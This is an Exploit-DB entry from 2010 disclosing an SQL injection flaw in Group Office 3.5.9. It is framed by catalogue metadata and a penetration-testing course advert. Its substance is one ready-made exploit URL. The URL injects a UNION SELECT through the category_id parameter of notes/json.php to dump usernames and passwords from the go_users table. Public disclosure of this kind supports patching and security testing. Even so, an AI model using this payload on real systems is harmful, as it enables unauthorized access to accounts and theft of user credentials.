Group Office 3.5.9 - SQL Injection

EDB-ID:

14988


Author:

ViciOuS

Type:

webapps


Platform:

PHP

Date:

2010-09-13


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

=====================================================================================
Group Office (/notes/json.php?task=category&category_id) SQL Injection Vulnerability
=====================================================================================

########################################################################################

Author : ViciOuS
Author Web Page :http://www.sabotaj.in
Email : vicious[at]sabotaj.in
Script Page : http://www.group-office.com

########################################################################################
 
Sql Injection :

http://localhost/www/groupoffice-com-3.5.9/modules/notes/json.php?task=category&category_id=999999 union(select 1,concat_ws(0x3a,username,password),3,4+from+go_users)--

########################################################################################
Thanks WwW.sabotaj.iN
########################################################################################